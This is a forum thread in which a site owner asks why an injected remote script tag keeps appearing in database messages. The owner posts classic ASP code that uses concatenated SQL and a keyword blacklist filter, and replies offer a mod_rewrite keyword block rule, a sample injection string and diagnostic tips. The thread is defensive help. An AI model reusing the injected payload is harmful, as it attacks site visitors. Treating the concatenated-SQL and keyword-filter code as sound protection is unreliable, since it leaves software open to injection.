Forum Moderators: phranque
I’m getting really down about all this. Its hard enough trying to start an online business . I have little experience in website security and its obvious current security levels are not good enough. Are there any security experts out there who would be kind enough to look at my code below and give me an idea of where I am going wrong. Thanks.
Firstly here is the injection that was written to my MS SQL database:
<script src=http://www.example.ru/ads.js></script>
It is NOT embedded in links BUT instead appears at the end of messages posted by my users. It has been added to messages that already existed In the database. It has not infected every database table though.
Below is the security that is applied to all input areas of my website:
conn.Execute "insert into tbl ([groupnewsid], [thecomment], [submittedby], [groupid], [dateofcomment]) " _
& "values ('" _
& clng(request.querystring("nid")) & _
"','" & Server.HTMLEncode(cleanuptext(request.form("txtnewscomment"))) & _
"','" & clng(session("userid")) & _
"','" & clng(session("groupid")) & _
"','" & FormatMediumDate(date()) & "')"
session("errmessage2") = ""
session("varcomment") = ""
end if
And below is the cleanuptext function:
'validation allows only good characters and disallows bad strings
function cleanuptext(input)
newstr = ""
input = replace(input,vbcrlf,"CCCCCCC")
good_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789""`!£$%&*()_-+=:;@'#<>,.?/ "
for i = 1 to len(input)
c = mid(input, i, 1)
if (InStr(good_chars, c) = 0) then
else
newstr = newstr & c
end if
next
newstr = replace(newstr,"'","`")
newstr = replace(newstr,"--","")
newstr = replace(newstr,"XP_","")
newstr = replace(newstr,"xp_","")
newstr = replace(newstr,";","semicolon")
newstr = replace(newstr,"*","asterisk")
newstr = replace(newstr,"=","equals")
newstr = replace(newstr,"%","percentage")
newstr = replace(newstr,"script","scr1pt")
newstr = replace(newstr,"Script","Scr1pt")
newstr = replace(newstr,"SCRIPT","SCR1PT")
newstr = replace(newstr,"union","un10n")
newstr = replace(newstr,"Union","Un10n")
newstr = replace(newstr,"UNION","UN10N")
newstr = replace(newstr,"insert","1ns3rt")
newstr = replace(newstr,"Insert","Ins3rt")
newstr = replace(newstr,"INSERT","1NS3RT")
newstr = replace(newstr,"drop","dr0p")
newstr = replace(newstr,"Drop","Dr0p")
newstr = replace(newstr,"DROP","DR0P")
newstr = replace(newstr,"delete","d3l3t3")
newstr = replace(newstr,"Delete","D3l3t3")
newstr = replace(newstr,"DELETE","D3L3T3")
newstr = replace(newstr,"create","cr34t3")
newstr = replace(newstr,"Create","Cr34t3")
newstr = replace(newstr,"CREATE","CR34T3")
newstr = replace(newstr,"select","s3l3ct")
newstr = replace(newstr,"Select","S3l3ct")
newstr = replace(newstr,"SELECT","S3L3CT")
newstr = replace(newstr,"exec","3x3c")
newstr = replace(newstr,"Exec","Ex3c")
newstr = replace(newstr,"EXEC","3X3C")
newstr = replace(newstr,"cast","c4st")
newstr = replace(newstr,"Cast","C4st")
newstr = replace(newstr,"CAST","C4ST")
newstr = replace(newstr,"varchar","v4rch4r")
newstr = replace(newstr,"Varchar","V4rch4r")
newstr = replace(newstr,"VARCHAR","V4RCH4R")
newstr = replace(newstr,"declare","d3cl4r3")
newstr = replace(newstr,"Declare","D3cl4r3")
newstr = replace(newstr,"DECLARE","D3CL4R3")
newstr = replace(newstr,"object","obj3ct")
newstr = replace(newstr,"Object","Obj3ct")
newstr = replace(newstr,"OBJECT","OBJ3CT")
newstr = replace(newstr,"embed","emb3d")
newstr = replace(newstr,"Embed","Emb3d")
newstr = replace(newstr,"EMBED","EMB3D")
newstr = replace(newstr,"CCCCCCC", vbcrlf)
cleanuptext = newstr
end function
Please help me. I would be really grateful if you could show me what’s missing or what’s wrong with my existing code?
thanks
[edited by: bill at 11:27 am (utc) on Oct. 13, 2009]
[edit reason] No links please, especially one from a hacked script [/edit]
# Some logic to thwart SQL Injection
RewriteCond %{QUERY_STRING} [^a-z](declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦truncate¦update)[^a-z] [NC]
RewriteRule (.*) - [F,L]
Doing it at the server level saves having to worry about it in your code.
I put the following in my apache server configuration to thwart sql injection:# Some logic to thwart SQL Injection
RewriteCond %{QUERY_STRING} [^a-z](declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦truncate¦update)[^a-z] [NC]
RewriteRule (.*) - [F,L]Doing it at the server level saves having to worry about it in your code.
Just a reminder that looking for SQL commands in a query needs particular care.
I know a garden and home products site (with a newsletter) that won't accept searches for "snowdrop", "Spring update" etc. It dumps you back at the home page. Took me a while to work out what was happening. It would look completely random to your average customer.
Just a reminder that looking for SQL commands in a query needs particular care.I know a garden and home products site (with a newsletter) that won't accept searches for "snowdrop", "Spring update" etc. It dumps you back at the home page. Took me a while to work out what was happening. It would look completely random to your average customer.
Yeah that's the problem with my site. Its a social networking site so there's no way I can remove words like drop and update. I needed to find a better way of doing it.
Would you say my code above is adequate or is anything missing?
- In SQL, you can put pretty much anything you want inside a string as long as you escape special characters like single-quote, double-quote, new-line, carriage return, null byte.
- Also make sure numeric values inside your SQL statments are actually numeric values, i.e. someone is not calling your script with
id=1; select * ...- If at all possible, make sure you're executing all SQL statements through your own function, then add a logging statement to that function so you can save the text of all SQL statements to a log file. That might help you figure out how the database is being hacked.
- It's possible that it's not your current script at all. Maybe the hacker added a trigger into your database during the first break-in, and that trigger is appending their code to all new comments.
- It's also possible the hacker has installed their own script on your server that runs periodically and changes the database, or maybe they can access your DB remotely. Try to change the password to fix the latter.
- To detect either of the above, try to add a new comment manually and see if the link is added to that as well.
Hope this helps.
I'm not familiar with MS applications, more of a PHP/MySQL type, nor an expert in security, but i can offer you some thoughts:- In SQL, you can put pretty much anything you want inside a string as long as you escape special characters like single-quote, double-quote, new-line, carriage return, null byte.
I believe I have already done this. Could somebody clarify by checking my cleanup script above?
- Also make sure numeric values inside your SQL statments are actually numeric values, i.e. someone is not calling your script with id=1; select * ... and you're using that value directly in your SQL.
Probably a dumb question but how and where do I check that numeric values are numeric values?
- If at all possible, make sure you're executing all SQL statements through your own function, then add a logging statement to that function so you can save the text of all SQL statements to a log file. That might help you figure out how the database is being hacked.- It's possible that it's not your current script at all. Maybe the hacker added a trigger into your database during the first break-in, and that trigger is appending their code to all new comments.
- It's also possible the hacker has installed their own script on your server that runs periodically and changes the database, or maybe they can access your DB remotely. Try to change the password to fix the latter.
- To detect either of the above, try to add a new comment manually and see if the link is added to that as well.
Hope this helps.
thanks for all this :)
